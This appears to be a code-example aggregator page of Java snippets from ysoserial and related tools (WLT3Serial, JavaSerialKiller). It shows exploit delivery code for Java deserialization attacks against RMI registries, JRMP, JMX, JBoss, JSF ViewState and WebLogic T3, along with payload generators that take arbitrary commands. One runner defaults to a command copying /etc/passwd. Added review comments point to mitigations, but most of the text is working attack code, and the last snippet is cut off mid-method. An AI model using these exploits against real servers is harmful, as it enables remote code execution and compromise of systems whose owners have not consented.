ysoserial.payloads.ObjectPayload.Utils Java Examples

Example #1
Source File: PayloadRunner.java    From ysoserial with MIT License 6 votes vote down vote up
/**
 * Generates the payload object for {@code clazz}, serializes it, then deserializes the
 * bytes again in this JVM as a local round-trip run.
 *
 * <p>Generation and serialization execute inside
 * {@code ExecCheckingSecurityManager.callWrapped}; the deserialization step runs afterwards,
 * outside that wrapper, and any exception it raises is only printed.
 * NOTE(review): deserializing the bytes is presumably what exercises the gadget chain, so
 * this runner belongs in an isolated, disposable test environment.
 *
 * @param clazz payload type, instantiated through its no-argument constructor
 * @param args  {@code args[0]}, when present and non-null, is the command string; otherwise
 *              {@code getDefaultTestCmd()} supplies it
 * @throws Exception anything propagated by the wrapped generation/serialization step
 */
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    final ExecCheckingSecurityManager guard = new ExecCheckingSecurityManager();

    // Generation has to finish without throwing before anything is deserialized.
    final byte[] serialized = guard.callWrapped(new Callable<byte[]>() {
        public byte[] call() throws Exception {
            final String command;
            if (args.length > 0 && args[0] != null) {
                command = args[0];
            } else {
                command = getDefaultTestCmd();
            }

            System.out.println("generating payload object(s) for command: '" + command + "'");

            final ObjectPayload<?> generator = clazz.newInstance();
            final Object graph = generator.getObject(command);

            System.out.println("serializing payload");
            final byte[] bytes = Serializer.serialize(graph);
            Utils.releasePayload(generator, graph);
            return bytes;
        }
    });

    try {
        System.out.println("deserializing payload");
        // The result is not used; only the act of deserializing matters here.
        Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
 
Example #2
Source File: JRMPClient.java    From ysoserial with MIT License 6 votes vote down vote up
/**
 * Command-line entry point: builds a payload object from {@code <payload_type>} and
 * {@code <payload_arg>} and passes it to {@code makeDGCCall} for the given host and port.
 *
 * <p>Expects {@code <host> <port> <payload_type> <payload_arg>}; with fewer than four
 * arguments the usage line is printed and the JVM exits with status -1. An exception from
 * the call is printed to stderr, after which the payload is handed to
 * {@code Utils.releasePayload}.
 *
 * @param args command-line arguments as described above
 */
public static final void main ( final String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    final String payloadType = args[2];
    final Object payloadObject = Utils.makePayloadObject(payloadType, args[3]);
    final String host = args[0];
    // Parsed outside the try block, so a malformed port propagates as NumberFormatException.
    final int portNumber = Integer.parseInt(args[1]);
    try {
        final String banner = String.format("* Opening JRMP socket %s:%d", host, portNumber);
        System.err.println(banner);
        makeDGCCall(host, portNumber, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #3
Source File: RMIRegistryExploit.java    From ysoserial with MIT License 6 votes vote down vote up
/**
 * Creates a payload for {@code command}, wraps it in a {@code Remote} proxy and binds that
 * proxy in {@code registry} under a generated name.
 *
 * <p>The whole sequence runs inside {@code ExecCheckingSecurityManager.callWrapped}. The bind
 * name is the literal prefix {@code "pwned"} followed by {@code System.nanoTime()}; a
 * {@code Throwable} from {@code bind} is printed rather than rethrown.
 * NOTE(review): for defenders, bind requests whose name carries that prefix are a simple
 * indicator to search for; limiting who can reach the registry and applying JDK
 * serialization filters are the usual mitigations - confirm for the JDK in use.
 *
 * @param registry     registry the proxy is bound in
 * @param payloadClass payload type, instantiated through its no-argument constructor
 * @param command      command string passed to the payload's {@code getObject}
 * @throws Exception anything propagated by the wrapped call
 */
public static void exploit(final Registry registry,
        final Class<? extends ObjectPayload> payloadClass,
        final String command) throws Exception {
    final ExecCheckingSecurityManager guard = new ExecCheckingSecurityManager();
    guard.callWrapped(new Callable<Void>() {
        public Void call() throws Exception {
            final ObjectPayload generator = payloadClass.newInstance();
            final Object payload = generator.getObject(command);
            final String bindName = "pwned" + System.nanoTime();
            final Remote proxy = Gadgets.createMemoitizedProxy(Gadgets.createMap(bindName, payload), Remote.class);
            try {
                registry.bind(bindName, proxy);
            } catch (Throwable e) {
                // Printed only; the payload is still released below.
                e.printStackTrace();
            }
            Utils.releasePayload(generator, payload);
            return null;
        }
    });
}
 
Example #4
Source File: JRMPListener.java    From ysoserial-modified with MIT License 6 votes vote down vote up
/**
 * Command-line entry point: builds a payload object and starts a {@code JRMPListener} on
 * the given port with it.
 *
 * <p>Expects {@code <port> <payload_type> <terminal_type> <cmd_to_exec>}; with fewer than
 * four arguments the usage line is printed and the JVM exits with status -1. The terminal
 * type and command are wrapped in a {@code CmdExecuteHelper} before payload creation. Any
 * exception from parsing the port or running the listener is reported on stderr, and the
 * payload is then handed to {@code Utils.releasePayload}.
 *
 * @param args command-line arguments as described above
 */
public static final void main ( final String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <terminal_type> <cmd_to_exec>");
        System.exit(-1);
        return;
    }

    final String payloadType = args[1];
    final CmdExecuteHelper commandHelper = new CmdExecuteHelper(args[2], args[3]);
    final Object payloadObject = Utils.makePayloadObject(payloadType, commandHelper);

    try {
        final int listenPort = Integer.parseInt(args[0]);
        System.err.println("* Opening JRMP listener on " + listenPort);
        final JRMPListener listener = new JRMPListener(listenPort, payloadObject);
        listener.run();
    }
    catch ( Exception e ) {
        System.err.println("Listener error");
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #5
Source File: RMIRegistryExploit.java    From ysoserial-modified with MIT License 6 votes vote down vote up
/**
 * Creates a payload from {@code terminalType} and {@code command}, wraps it in a
 * {@code Remote} proxy and binds that proxy in {@code registry} under a generated name.
 *
 * <p>The sequence runs inside {@code ExecCheckingSecurityManager.wrap}. The bind name is the
 * literal prefix {@code "pwned"} followed by {@code System.nanoTime()}; a {@code Throwable}
 * from {@code bind} is printed rather than rethrown.
 * NOTE(review): for defenders, bind requests whose name carries that prefix are a simple
 * indicator to search for; limiting who can reach the registry and applying JDK
 * serialization filters are the usual mitigations - confirm for the JDK in use.
 *
 * @param registry     registry the proxy is bound in
 * @param payloadClass payload type, instantiated through its no-argument constructor
 * @param terminalType first argument of the {@code CmdExecuteHelper} constructor
 * @param command      second argument of the {@code CmdExecuteHelper} constructor
 * @throws Exception anything propagated by the wrapped call
 */
public static void exploit(final Registry registry,
        final Class<? extends ObjectPayload> payloadClass,
        final String terminalType,
        final String command) throws Exception {
    final ExecCheckingSecurityManager guard = new ExecCheckingSecurityManager();
    guard.wrap(new Callable<Void>() {
        public Void call() throws Exception {
            final ObjectPayload generator = payloadClass.newInstance();
            final CmdExecuteHelper commandHelper = new CmdExecuteHelper(terminalType, command);
            final Object payload = generator.getObject(commandHelper);
            final String bindName = "pwned" + System.nanoTime();
            final Remote proxy = Gadgets.createMemoitizedProxy(Gadgets.createMap(bindName, payload), Remote.class);
            try {
                registry.bind(bindName, proxy);
            } catch (Throwable e) {
                // Printed only; the payload is still released below.
                e.printStackTrace();
            }
            Utils.releasePayload(generator, payload);
            return null;
        }
    });
}
 
Example #6
Source File: JRMPClient.java    From ysoserial-modified with MIT License 6 votes vote down vote up
/**
 * Command-line entry point: builds a payload object from the payload type, terminal type
 * and command, and passes it to {@code makeDGCCall} for the given host and port.
 *
 * <p>Expects {@code <host> <port> <payload_type> <terminal_type> <cmd_to_exec>}; with fewer
 * than five arguments the usage line is printed and the JVM exits with status -1. An
 * exception from the call is printed to stderr, after which the payload is handed to
 * {@code Utils.releasePayload}.
 *
 * @param args command-line arguments as described above
 */
public static final void main ( final String[] args ) {
    if ( args.length < 5 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <terminal_type> <cmd_to_exec>");
        System.exit(-1);
    }

    final String payloadType = args[2];
    final CmdExecuteHelper commandHelper = new CmdExecuteHelper(args[3], args[4]);
    final Object payloadObject = Utils.makePayloadObject(payloadType, commandHelper);
    final String host = args[0];
    // Parsed outside the try block, so a malformed port propagates as NumberFormatException.
    final int portNumber = Integer.parseInt(args[1]);
    try {
        final String banner = String.format("* Opening JRMP socket %s:%d", host, portNumber);
        System.err.println(banner);
        makeDGCCall(host, portNumber, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #7
Source File: JRMPListener.java    From ysoserial with MIT License 6 votes vote down vote up
/**
 * Command-line entry point: builds a payload object and starts a {@code JRMPListener} on
 * the given port with it.
 *
 * <p>Expects {@code <port> <payload_type> <payload_arg>}; with fewer than three arguments
 * the usage line is printed and the JVM exits with status -1. Any exception from parsing
 * the port or running the listener is reported on stderr, and the payload is then handed to
 * {@code Utils.releasePayload}.
 *
 * @param args command-line arguments as described above
 */
public static final void main ( final String[] args ) {
    if ( args.length < 3 ) {
        System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
        System.exit(-1);
        return;
    }

    final String payloadType = args[1];
    final Object payloadObject = Utils.makePayloadObject(payloadType, args[2]);

    try {
        final int listenPort = Integer.parseInt(args[0]);
        System.err.println("* Opening JRMP listener on " + listenPort);
        final JRMPListener listener = new JRMPListener(listenPort, payloadObject);
        listener.run();
    }
    catch ( Exception e ) {
        System.err.println("Listener error");
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #8
Source File: JMXInvokeMBean.java    From ysoserial with MIT License 6 votes vote down vote up
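/**
 * Command-line entry point: connects to a JMX endpoint over RMI and invokes
 * {@code getLoggerLevel} on the {@code java.util.logging:type=Logging} MBean with a payload
 * object as the argument, although the declared signature is {@code String}.
 *
 * <p>Expects {@code <host> <port> <payload_type> <payload_arg>}; with fewer than four
 * arguments the usage line is printed and the JVM exits with status -1. The connector is
 * closed in a {@code finally} block so that a failing invocation does not leave the
 * connection open.
 * NOTE(review): the connection is opened without credentials, so this only reaches
 * endpoints that accept unauthenticated JMX; requiring JMX authentication and applying JDK
 * serialization filters are the usual defences - confirm for the JDK in use.
 *
 * @param args command-line arguments as described above
 * @throws Exception anything raised while connecting, invoking or closing
 */
public static void main(String[] args) throws Exception {

    if ( args.length < 4 ) {
        System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");

    JMXConnector jmxConnector = JMXConnectorFactory.connect(url);
    try {
        MBeanServerConnection mbeanServerConnection = jmxConnector.getMBeanServerConnection();

        // create the payload
        Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
        ObjectName mbeanName = new ObjectName("java.util.logging:type=Logging");

        mbeanServerConnection.invoke(mbeanName, "getLoggerLevel", new Object[]{payloadObject}, new String[]{String.class.getCanonicalName()});
    } finally {
        // Close the connection on every path, including when the invocation throws.
        jmxConnector.close();
    }
}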
 
Example #9
Source File: ClassTableEntry.java    From WLT3Serial with MIT License 6 votes vote down vote up
/**
 * Writes this entry to {@code oo}: either a generated payload object or the regular
 * {@code descriptor}, followed in both cases by {@code annotation}.
 *
 * <p>The payload branch is taken only when the system properties
 * {@code bort.millipede.wlt3.type} and {@code bort.millipede.wlt3.command} are both set and
 * {@code sent} is still false. After writing the payload, {@code sent} is set to true and the
 * property {@code bort.millipede.wlt3.sent} is set to {@code "true"}, so the branch is not
 * taken again while {@code sent} stays true. Every exception, including an
 * {@code IOException} from the stream, is caught and reported on stderr instead of
 * propagating to the caller.
 *
 * @param oo stream the entry is written to
 */
@Override
public void writeExternal(ObjectOutput oo) throws IOException {
    try {
        final String typeProperty = System.getProperty("bort.millipede.wlt3.type");
        final String commandProperty = System.getProperty("bort.millipede.wlt3.command");
        final boolean optionsPresent = (typeProperty != null) && (commandProperty != null);

        if (!optionsPresent || sent) {
            // No payload options, or the payload already went out: write the normal descriptor.
            oo.writeObject(descriptor);
        } else {
            final Class<? extends ObjectPayload> resolved = Utils.getPayloadClass(typeProperty);
            final ObjectPayload generator = resolved.newInstance();
            oo.writeObject(generator.getObject(commandProperty));
            sent = true;
            System.setProperty("bort.millipede.wlt3.sent", Boolean.toString(true));
        }
        oo.writeBytes(annotation);
    } catch (Exception e) {
        System.err.println("Exception occurred in custom ClassTableEntry class writeExternal() method!!!");
        e.printStackTrace();
    }
}
 
Example #10
Source File: GeneratePayload.java    From ysoserial with MIT License 6 votes vote down vote up
/**
 * Prints the banner, the usage line and a table of the available payload types to stderr.
 *
 * <p>The payload classes come from {@code ObjectPayload.Utils.getPayloadClasses()} and are
 * sorted with {@code Strings.ToStringComparator}. Each table row holds the class's simple
 * name, its authors (each prefixed with {@code @}) and its dependencies; the table is laid
 * out by {@code Strings.formatTable} and every line is indented by five spaces.
 */
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
    System.err.println("  Available payload types:");

    final List<Class<? extends ObjectPayload>> sortedPayloads =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(sortedPayloads, new Strings.ToStringComparator()); // alphabetical order

    // Header and separator rows first, then one row per payload class.
    final List<String[]> table = new LinkedList<String[]>();
    table.add(new String[] {"Payload", "Authors", "Dependencies"});
    table.add(new String[] {"-------", "-------", "------------"});
    for (Class<? extends ObjectPayload> payloadClass : sortedPayloads) {
        final String name = payloadClass.getSimpleName();
        final String authors =
            Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", "");
        final String dependencies =
            Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "");
        table.add(new String[] {name, authors, dependencies});
    }

    for (String line : Strings.formatTable(table)) {
        System.err.println("     " + line);
    }
}
 
Example #11
Source File: GeneratePayload.java    From JavaSerialKiller with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: resolves the payload type named in {@code args[0]}, builds the
 * object for the command in {@code args[1]} and writes its serialized form to stdout.
 *
 * <p>Exits with {@code USAGE_CODE} after printing usage when the argument count is not two
 * or the payload type is unknown, with {@code INTERNAL_ERROR_CODE} when generation or
 * serialization throws, and with 0 otherwise.
 *
 * @param args {@code [payload type, command]}
 */
public static void main(final String[] args) {
    if (args.length != 2) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String command = args[1];

    final Class<? extends ObjectPayload> resolved = Utils.getPayloadClass(payloadType);
    if (resolved == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
    }

    try {
        final ObjectPayload generator = resolved.newInstance();
        final Object graph = generator.getObject(command);
        // The serialized bytes go to stdout; diagnostics stay on stderr.
        final PrintStream sink = System.out;
        Serializer.serialize(graph, sink);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
 
Example #12
Source File: JBoss.java    From ysoserial with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: builds a payload object and passes it, together with the target
 * URI and optional credentials, to {@code doRun}.
 *
 * <p>Expects {@code <uri> <payload> <payload_arg>}; with fewer than three arguments the
 * usage line is printed and the JVM exits with status -1. When the URI carries user-info it
 * must have the form {@code user:password}, otherwise the JVM exits with status -1. The
 * payload is handed to {@code Utils.releasePayload} after {@code doRun} returns.
 * NOTE(review): credentials embedded in a command-line URI end up in shell history and
 * process listings; treat any account used this way as exposed.
 *
 * @param args command-line arguments as described above
 */
public static void main ( String[] args ) {
    if ( args.length < 3 ) {
        System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
        System.exit(-1);
    }

    final URI target = URI.create(args[0]);
    final String payloadType = args[1];
    final Object payloadObject = Utils.makePayloadObject(payloadType, args[2]);

    String username = null;
    String password = null;
    final String userInfo = target.getUserInfo();
    if ( userInfo != null ) {
        // Split on the first ':' only, so the password part may itself contain colons.
        final int separator = userInfo.indexOf(':');
        if ( separator < 0 ) {
            System.err.println("Need <user>:<password>@");
            System.exit(-1);
        }
        else {
            username = userInfo.substring(0, separator);
            password = userInfo.substring(separator + 1);
        }
    }

    doRun(target, payloadObject, username, password);
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #13
Source File: JSF.java    From ysoserial with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: serializes a payload object, Base64- and URL-encodes it, and
 * POSTs it to the given URL as the {@code javax.faces.ViewState} form parameter.
 *
 * <p>Expects {@code <view_url> <payload_type> <payload_arg>}; with fewer than three
 * arguments the usage line is printed and the JVM exits with status -1. A non-HTTP URL is
 * rejected with {@code IllegalArgumentException}. All exceptions inside the request are
 * printed to stderr, the response code and message are reported, and the payload is then
 * handed to {@code Utils.releasePayload}.
 * NOTE(review): the object is sent as plain Base64 with no signature or encryption, so it is
 * presumably only accepted by applications that deserialize client-supplied view state
 * without integrity protection; enabling ViewState encryption/MAC on the server is the
 * usual defence - confirm against the JSF implementation's documentation.
 *
 * @param args command-line arguments as described above
 */
public static void main ( String[] args ) {
    if ( args.length < 3 ) {
        System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    final String payloadType = args[1];
    final Object payloadObject = Utils.makePayloadObject(payloadType, args[2]);

    try {
        final URL viewUrl = new URL(args[0]);
        final URLConnection rawConnection = viewUrl.openConnection();
        if ( !(rawConnection instanceof HttpURLConnection) ) {
            throw new IllegalArgumentException("Not a HTTP url");
        }

        final HttpURLConnection http = (HttpURLConnection) rawConnection;
        http.setDoOutput(true);
        http.setRequestMethod("POST");
        http.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        final OutputStream requestStream = http.getOutputStream();

        // Serialize into memory first so the bytes can be encoded as a form value.
        final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        final ObjectOutputStream objectOut = new ObjectOutputStream(buffer);
        objectOut.writeObject(payloadObject);
        objectOut.close();
        final byte[] serialized = buffer.toByteArray();
        final String encodedState = URLEncoder.encode(Base64.encodeBase64String(serialized), "US-ASCII");
        final String requestBody = "javax.faces.ViewState=" + encodedState;
        requestStream.write(requestBody.getBytes("US-ASCII"));
        requestStream.close();

        System.err.println("Have response code " + http.getResponseCode() + " " + http.getResponseMessage());
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #14
Source File: GeneratePayload.java    From ysoserial with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: resolves the payload type named in {@code args[0]}, builds the
 * object for the command in {@code args[1]}, writes its serialized form to stdout and hands
 * the payload to {@code ObjectPayload.Utils.releasePayload}.
 *
 * <p>Exits with {@code USAGE_CODE} after printing usage when the argument count is not two
 * or the payload type is unknown, with {@code INTERNAL_ERROR_CODE} when generation or
 * serialization throws, and with 0 otherwise.
 *
 * @param args {@code [payload type, command]}
 */
public static void main(final String[] args) {
    if (args.length != 2) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String command = args[1];

    final Class<? extends ObjectPayload> resolved = Utils.getPayloadClass(payloadType);
    if (resolved == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // keeps static null analysis satisfied
    }

    try {
        final ObjectPayload generator = resolved.newInstance();
        final Object graph = generator.getObject(command);
        // The serialized bytes go to stdout; diagnostics stay on stderr.
        final PrintStream sink = System.out;
        Serializer.serialize(graph, sink);
        ObjectPayload.Utils.releasePayload(generator, graph);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
 
Example #15
Source File: GeneratePayload.java    From JavaSerialKiller with MIT License 5 votes vote down vote up
/**
 * Prints the banner, the usage line and the list of available payload types to stderr.
 *
 * <p>The payload classes come from {@code ObjectPayload.Utils.getPayloadClasses()} and are
 * sorted with {@code ToStringComparator}; each is printed as its simple name followed by the
 * list returned by {@code Dependencies.Utils.getDependencies}.
 */
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
    System.err.println("\tAvailable payload types:");

    final List<Class<? extends ObjectPayload>> sortedPayloads =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(sortedPayloads, new ToStringComparator()); // alphabetical order

    for (Class<? extends ObjectPayload> payloadClass : sortedPayloads) {
        final String name = payloadClass.getSimpleName();
        final List<?> dependencies = Arrays.asList(Dependencies.Utils.getDependencies(payloadClass));
        System.err.println("\t\t" + name + " " + dependencies);
    }
}
 
Example #16
Source File: GeneratePayload.java    From ysoserial-modified with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: resolves the payload type in {@code args[0]}, checks the
 * terminal type in {@code args[1]} against {@code terminalTypes}, builds the object for the
 * command in {@code args[2]}, writes its serialized form to stdout and hands the payload to
 * {@code ObjectPayload.Utils.releasePayload}.
 *
 * <p>Exits with {@code USAGE_CODE} after printing usage when the argument count is not
 * three, the payload type is unknown or the terminal type is not listed; with
 * {@code INTERNAL_ERROR_CODE} when generation or serialization throws; and with 0 otherwise.
 *
 * @param args {@code [payload type, terminal type, command]}
 */
public static void main(final String[] args) {
    if (args.length != 3) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String terminalType = args[1];
    final String command = args[2];

    final Class<? extends ObjectPayload> resolved = Utils.getPayloadClass(payloadType);
    if (resolved == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // keeps static null analysis satisfied
    }

    final boolean knownTerminal = terminalTypes.contains(terminalType);
    if (!knownTerminal) {
        System.err.println("Invalid terminal type '" + terminalType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // keeps static null analysis satisfied
    }

    try {
        final ObjectPayload generator = resolved.newInstance();
        final CmdExecuteHelper commandHelper = new CmdExecuteHelper(terminalType, command);
        final Object graph = generator.getObject(commandHelper);
        // The serialized bytes go to stdout; diagnostics stay on stderr.
        final PrintStream sink = System.out;
        Serializer.serialize(graph, sink);
        ObjectPayload.Utils.releasePayload(generator, graph);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
 
Example #17
Source File: WLT3Serial.java    From WLT3Serial with MIT License 5 votes vote down vote up
/**
 * Prints the WLT3Serial help text to stderr: the usage line, the option descriptions and
 * the list of payload types found on the classpath.
 *
 * <p>The payload list comes from {@code ObjectPayload.Utils.getPayloadClasses()}, sorted with
 * {@code Strings.ToStringComparator}. A {@code NoClassDefFoundError} is reported as a missing
 * ysoserial jar; any other {@code Exception} is reported with its class name.
 */
private static void usage() {
    // Fixed help text, printed line by line in this order.
    final String[] helpLines = {
        "Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD",
        "\nOptions:",
        "\t--help\t\t\t\tprint usage (you\'re lookin at it)\n",
        "\t--verbose\t\t\tVerbose output (full thrown exception output; Disabled by default)\n",
        "\t--method=EXPLOIT_METHOD\t\tExploit Method for delivering generated ysoserial payload",
        "\t\tExploit Methods:\n\t\t\tProperty\tSend ysoserial payload as connection environment property value (Default; via javax.naming.Context.lookup(), variation of ysoserial.exploit.RMIRegistryExploit)",
        "\t\t\tBind\t\tSend ysoserial payload as object to bind to name (via javax.naming.Context.bind(), similar to ysoserial.exploit.RMIRegistryExploit)",
        "\t\t\tWLBind\t\tSend ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)",
        "\t\t\tCustomClass\tSend ysoserial payload during T3/T3S connection initialization (via custom weblogic.rjvm.ClassTableEntry class, similar to JavaUnserializeExploits weblogic.py)\n",
        "\t--t3s[=PROTOCOL]\t\tUse T3S (transport-encrypted) connection (Disabled by default)",
        "\t\tProtocols:\n\t\t\tTLSv1.2\n\t\t\tTLSv1.1\n\t\t\tTLSv1 (Default)\n\t\t\tSSLv3",
        "\t\t\tSSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a WLT3Serial limitation)\n\n",
        "Available Payload Types (WebLogic is usually vulnerable to \"CommonsCollectionsX\" and \"JRMPClientX\" types):"
    };
    for (String helpLine : helpLines) {
        System.err.println(helpLine);
    }

    // List the payload types that are available, or explain why they could not be listed.
    try {
        final List<Class<? extends ObjectPayload>> available =
            new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        Collections.sort(available, new Strings.ToStringComparator());
        for (Class<? extends ObjectPayload> payloadClass : available) {
            System.err.println("\t"+payloadClass.getSimpleName());
        }
        System.err.println("");
    } catch(NoClassDefFoundError missingJar) {
        System.err.println("\tNo ysoserial object payload classes found! Ensure that ysoserial jar file is in classpath when executing WLT3Serial!\n");
    } catch(Exception e) {
        System.err.println("\tUnknown Error occurred while listing ysoserial object payload classes ("+e.getClass().getName()+")!");
    }
}
 
Example #18
Source File: PayloadRunner.java    From ysoserial-modified with MIT License 5 votes vote down vote up
/**
 * Generates the payload object for {@code clazz}, serializes it, then deserializes the
 * bytes again in this JVM as a local round-trip run.
 *
 * <p>Generation and serialization execute inside {@code ExecCheckingSecurityManager.wrap};
 * the deserialization step runs afterwards, outside that wrapper, and any exception it
 * raises is only printed. The command is wrapped in a {@code CmdExecuteHelper} with the
 * terminal type fixed to {@code "bash"}.
 * NOTE(review): deserializing the bytes is presumably what exercises the gadget chain, and
 * the built-in default command writes to a file under {@code /tmp}, so this runner belongs
 * in an isolated, disposable test environment.
 *
 * @param clazz payload type, instantiated through its no-argument constructor
 * @param args  {@code args[0]}, when present and non-null, is the command string; otherwise
 *              the hard-coded default is used
 * @throws Exception anything propagated by the wrapped generation/serialization step
 */
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    final ExecCheckingSecurityManager guard = new ExecCheckingSecurityManager();

    // Generation has to finish without throwing before anything is deserialized.
    final byte[] serialized = guard.wrap(new Callable<byte[]>() {
        public byte[] call() throws Exception {
            final String command;
            if (args.length > 0 && args[0] != null) {
                command = args[0];
            } else {
                command = "cat /etc/passwd > /tmp/seraquefunfou";
            }

            System.out.println("generating payload object(s) for command: '" + command + "'");

            final CmdExecuteHelper commandHelper = new CmdExecuteHelper("bash", command);

            final ObjectPayload<?> generator = clazz.newInstance();
            final Object graph = generator.getObject(commandHelper);

            System.out.println("serializing payload");
            final byte[] bytes = Serializer.serialize(graph);
            Utils.releasePayload(generator, graph);
            return bytes;
        }
    });

    try {
        System.out.println("deserializing payload");
        // The result is not used; only the act of deserializing matters here.
        Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
 
Example #19
Source File: JBoss.java    From ysoserial-modified with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: builds a payload object from the payload type, terminal type
 * and command, and passes it, together with the target URI and optional credentials, to
 * {@code doRun}.
 *
 * <p>Expects {@code <uri> <payload> <terminal_type> <cmd_to_execute>}; with fewer than four
 * arguments the usage line is printed and the JVM exits with status -1. When the URI carries
 * user-info it must have the form {@code user:password}, otherwise the JVM exits with
 * status -1. The payload is handed to {@code Utils.releasePayload} after {@code doRun}
 * returns.
 * NOTE(review): credentials embedded in a command-line URI end up in shell history and
 * process listings; treat any account used this way as exposed.
 *
 * @param args command-line arguments as described above
 */
public static void main ( String[] args ) {
    if ( args.length < 4 ) {
        System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <terminal_type> <cmd_to_execute>");
        System.exit(-1);
    }

    final URI target = URI.create(args[0]);
    final String payloadType = args[1];
    final CmdExecuteHelper commandHelper = new CmdExecuteHelper(args[2], args[3]);
    final Object payloadObject = Utils.makePayloadObject(payloadType, commandHelper);

    String username = null;
    String password = null;
    final String userInfo = target.getUserInfo();
    if ( userInfo != null ) {
        // Split on the first ':' only, so the password part may itself contain colons.
        final int separator = userInfo.indexOf(':');
        if ( separator < 0 ) {
            System.err.println("Need <user>:<password>@");
            System.exit(-1);
        }
        else {
            username = userInfo.substring(0, separator);
            password = userInfo.substring(separator + 1);
        }
    }

    doRun(target, payloadObject, username, password);
    Utils.releasePayload(payloadType, payloadObject);
}
 
Example #20
Source File: JSF.java    From ysoserial-modified with MIT License 5 votes vote down vote up
/**
 * Command-line entry point: serializes a payload object, Base64- and URL-encodes it, and
 * POSTs it to the given URL as the {@code javax.faces.ViewState} form parameter.
 *
 * <p>Expects {@code <view_url> <payload_type> <terminal_type> <payload_arg>}; with fewer
 * than four arguments the usage line is printed and the JVM exits with status -1. A non-HTTP
 * URL is rejected with {@code IllegalArgumentException}. All exceptions inside the request
 * are printed to stderr, the response code and message are reported, and the payload is
 * then handed to {@code Utils.releasePayload}.
 * NOTE(review): the object is sent as plain Base64 with no signature or encryption, so it is
 * presumably only accepted by applications that deserialize client-supplied view state
 * without integrity protection; enabling ViewState encryption/MAC on the server is the
 * usual defence - confirm against the JSF implementation's documentation.
 *
 * @param args command-line arguments as described above
 */
public static void main ( String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JSF.class.getName() + " <view_url> <payload_type> <terminal_type> <payload_arg>");
        System.exit(-1);
    }

    final String payloadType = args[1];
    final CmdExecuteHelper commandHelper = new CmdExecuteHelper(args[2], args[3]);
    final Object payloadObject = Utils.makePayloadObject(payloadType, commandHelper);

    try {
        final URL viewUrl = new URL(args[0]);
        final URLConnection rawConnection = viewUrl.openConnection();
        if ( !(rawConnection instanceof HttpURLConnection) ) {
            throw new IllegalArgumentException("Not a HTTP url");
        }

